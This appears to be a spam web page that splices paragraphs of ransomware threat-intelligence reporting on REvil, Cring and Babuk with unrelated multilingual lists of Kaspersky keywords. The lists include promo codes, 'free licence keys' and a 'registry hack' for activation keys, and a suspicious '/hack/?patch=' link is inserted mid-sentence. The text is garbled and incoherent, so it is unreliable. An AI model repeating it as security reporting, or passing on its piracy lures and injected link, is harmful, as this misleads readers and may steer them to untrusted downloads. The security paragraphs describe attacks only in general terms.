0

The developers regularly update the REvil ransomware to avoid detection and improve the reliability of ongoing attacks. The group announces all major updates and availability of new partner program items in their various threads on cybercriminal forums. On April 18, 2021, the developer announced that the *nix implementation of the ransomware was undergoing closed testing.

1
  • To do this, double-click on the Kaspersky icon running in the system tray or notification area
  • Kaspersky KTS- Total Security Multi Device Promo Code License Only – 1 User Windows Mac Android 1 Year
  • Poste de travail: Kaspersky joue le 3-en-1 pour une protection et une visibilité complètes
  • Kaspersky Lab: Khi bị mất dữ liệu người dùng mới biết nó thật sự quan trọng
  • Tải Kaspersky Free 2021 hỗ trợ tiếng Việt đi kèm nhiều tính năng bảo vệ PC
  • Beta registry hack which allowed users to get genuine activation keys right from Kaspersky servers
  • In an independent test and review in 2021 Kaspersky products secured 73 first-place positions
  • Cài Kaspersky bị xung đột với Garena không thấy phòng Host nào
  • PacificLight conducts Kaspersky Industrial CyberSecurity Assessment to futureproof IT and ICS defenses

The ransomware operators drop customized Mimikatz samples and Cobalt Strike threat emulation framework after they gain initial access to their targeted network. Then they deploy the Cring ransomware payload after downloading it onto the device using authentic Windows CertUtil certificate manager to deceive security software.

2

Improved speed for certain installation scenarios, the first startup, and the first update of the application

In addition to the text, the ransom note contains a list of links to screenshots of some exfiltrated data. This proves that the malware sample is crafted after the victim’s data is exfiltrated. As mentioned above, each sample is customized for the specific target.

Security Update Comments Feed

But by placing themselves under the spotlight, such groups hide the actual complexity of the ransomware ecosystem. From the outside, they may appear to be single entities; but they are in fact only the tip of the spear. In most attacks there are a significant number of actors involved, and a key takeaway is that they supply services to each other through dark web marketplaces.

3

The victims of this campaign include companies such as Travelex, Brown-Forman Corp, the pharmaceutical group Pierre Fabre, and the celebrity law firm Grubman Shire Meiselas & Sacks. In March 2021, the gang breached Acer and demanded the highest recorded ransom of $50 million.

Although Google has confirmed that exploits are already known to exist in the wild, there has been no confirmation of those attacks or, indeed, the attackers with that exploit code. Which has led to some speculation that this could be related to the January warnings from Microsoft and Google of North Korean threat actors using a Chrome zero-day in an active hacking campaign aimed at security researchers.

4

Additionally, operators screen potential partners to reduce the chances of hiring an undercover official, for instance, by checking their knowledge of the country they claim to be from, as illustrated in the example below. They may also impose restrictions on certain nationalities based on their political views. These are just some of the ways operators try to ensure their security.

REvil uses the Salsa20 symmetric stream algorithm for encrypting the content of files and the keys for it with an elliptic curve asymmetric algorithm. The malware sample has an encrypted configuration block with many fields, which allow attackers to fine-tune the payload. The executable can terminate blacklisted processes prior to encryption, exfiltrate basic host information, encrypt non-whitelisted files and folders on local storage devices and network shares. A more detailed account of the technical capabilities of REvil is available in our private and public reports.

5

Privilege elevation, reconnaissance and lateral movement follow a successful breach. The operators then evaluate, exfiltrate and encrypt sensitive files. The next stage is negotiations with the attacked company.

But this is also an area where there is more than meets the eye, because of the diversity of the ransomware ecosystem. There is, of course, a documented porosity between the ransomware ecosystem and other cybercrime domains such as carding or point-of-sale (PoS) hacking. But it is worth pointing out that not all members of this ecosystem originate from the cybercrime underworld. In the past, high-profile ransomware attacks have been used as a destructive means. It is not unreasonable to think that some APT actors are still resorting to similar tactics to destabilize rival economies while maintaining strong plausible deniability.

6

The group behind the Babuk locker primarily targets large industrial organizations in Europe, the US and Oceania. Targeted industries include, but are not limited to, transportation services, the healthcare sector, and various suppliers of industrial equipment. In fact, recent cases show that Babuk operators are expanding their targets.

Ransomware world in 2021: who, how and why

In one incident, the ransomware caused a temporary shutdown of an organization’s industrial process after the server was encrypted. There is no news about how this issue was resolved.

7

The ransomware market is a closed one, and the operators behind it are careful about who they choose to work with. This caution is reflected in the ads the operators place and criteria they impose when selecting partners.

Cring ransomware encrypts specific files on the infected devices. It uses strong encryption algorithms and removes backup files as well.

8
  • Kaspersky Total Security для всех устройств продление лицензии на 2 устройства
  • If anybody finds something that works as of the last update of DecrypterStop by Djvu in 2021
  • H Kaspersky Lab παρουσιάζει το ανανεωμένο Kaspersky Password Manager
  • Η Kaspersky Lab παρουσιάζει τη λύση Kaspersky Fraud Prevention Cloud
  • تنزيل برنامج كاسبر سكاي Kaspersky 2021 مع المفتاح مفعل مدى الحياة
  • Kaspersky: Seven day work week DDoS attacks almost double in Q4
  • For more details, you can visit this page of Kaspersky
  • تحميل و تفعيل برنامج KRT CLUB 31029 – kaspersky interent security
  • Kaspersky detects AZORult malware that exploits a popular VPN service

Unpatched vulnerable VPN servers hit by Cring ransomware

On April 18, 2021, a member of the REvil group announced that the gang was on the cusp of declaring its “most high-profile attack ever” in a post on forums where cybercriminals recruit new affiliates. On April 20, the group published a number of alleged blueprints for Apple devices on the Happy Blog site. According to the attackers, the data was stolen from Quanta’s network. Quanta Computer is a Taiwan-based manufacturer and one of Apple’s partners. Quanta’s initial ransom demand was $50 million.

9
  • Đón xuân Kỷ Hợi nhận lì xì đỏ cùng Kaspersky
  • Kaspersky 10 yıllık büyümenin ardından iş ortakları ağını genişletiyor
  • Kaspersky: valideynlər uşaqları ilə internet təhlükəsizliyi qaydalarını müzakirə edib
  • Kaspersky Small Office Security 8 Bêta – Gratuit 1 an
  • Kaspersky Cyber Attack Map
  • Kaspersky Mobile Security Lite
  • Free Kaspersky Licence keys

To distribute ransomware, REvil cooperates with affiliates hired on cybercriminal forums. The ransom demand is based on the annual revenue of the victim, and distributors earn between 60% and 75% of the ransom. Monero (XMR) cryptocurrency is used for payment. According to the interview with the REvil operator, the gang earned over $100 million from its operations in 2021.

10

Like Chrome itself, the update will only be applied once you restart your browser

While many ransomware operators look for partners, some sell ransomware source code or do-it-yourself (DIY) ransomware packages. Such offers vary from US$300 to US$5000.

When it comes to the sale of digital goods or services related to cybercrime on the darknet, most information is aggregated on just a few large platforms, though there are multiple smaller thematic ones focusing on a single topic or product. We analyzed three main forums on which ransomware-related offers are aggregated. These forums are the main platforms where cybercriminals that work with ransomware actively communicate and trade. While the forums host hundreds of various advertisements and offers, for analysis we selected just a few dozen offers that had been verified by forum administrations and placed by groups with an established reputation. These ads included a variety of offers from the sale of source code to regularly updated (https://aprel-vologda.ru/hack/?patch=6971) recruitment advertisements, available in English and Russian.

11

According to the post on this site, the gang was able to exfiltrate more than 250 GB of data from Washington’s Metropolitan Police Department network. At the time of writing, the police department had three days to start the negotiation process with the attackers; otherwise, the group would start leaking data to criminal gangs. Babuk also warned that it would continue to attack the US state sector.

Advised users to update now

When the red team is ready to launch the attack, it will purchase a ransomware product from dark web developers, usually in exchange for a cut of the ransom. An optional role here is the packer developer, who may add protection layers to the ransomware program and make it harder for security products to detect for the few hours it needs to encrypt the whole network.

12

Over the past couple of years, so-called JS-skimming (the method of stealing of payment card data from online stores) has gained immense popularity among attackers. Currently, Kaspersky researchers are aware of at least 10 different actors involved in these type of attacks and experts believe that their number will continue to grow during the next year. The most dangerous attacks will be on companies that provide services such as e-commerce as-a-service, which will lead to the compromise of thousands of companies.

This vulnerability also allows the ransomware operators to breach the targeted network’s security. Cring operators laterally move on their target’s enterprise network through Fortinet VPN device and steal Windows user credentials via Mimikatz so as to control domain admin account.

13

At the end of April 2021, the threat actors behind Babuk announced the end of their activity, stating that they will make their source code publicly available in order to “do something like Open Source RaaS”. This means that we’ll probably see a new wave of ransomware activity as soon as various smaller threat actors adopt the leaked source code for their operations. We’ve seen this sort of situation happen before with other RaaS and MaaS projects – the Cerberus banking Trojan for Android is a good example from last year.

Kaspersky achieves ISO 27001 certification
1 Mua Kaspersky Small Office Security tặng Acronis True Image 75%
2 Kaspersky: El phishing financiero creció un 95 en el 67%
3 Kaspersky Internet Security 2021 – 5 Devices 76%
4 Kaspersky о проблемах безопасности мобильных сетей 5G 69%
5 Продление Kaspersky Internet Security 1 год 2 ПК карта 55%
6 Kaspersky – kết nối an toàn – quà vui ngày tết 25%
7 Upto 60 Off Kaspersky Canada Coupon Code amp Discount 32%
14

According to our research, this malware affected almost 20 business sectors. The largest share of victims fell into the category Engineering & Manufacturing (30%), followed by Finance (14%), Professional & Consumer Services (9%), Legal (7%), and IT & Telecommunications (7%).

In 2021, Kaspersky experts expect an increase in the activity of groups specialised in criminal-to-criminal sale of network access to banks in the African and Asian regions, as well as in Eastern Europe. Their prime targets are small banks, as well as financial organisations recently bought by big players who are rebuilding their cybersecurity system in accordance with the standards of their parent companies. Besides it is expected that the same banks may become victims of targeted ransomware attacks, as banks are among those organisations that are more likely to pay a ransom than accept the loss of data.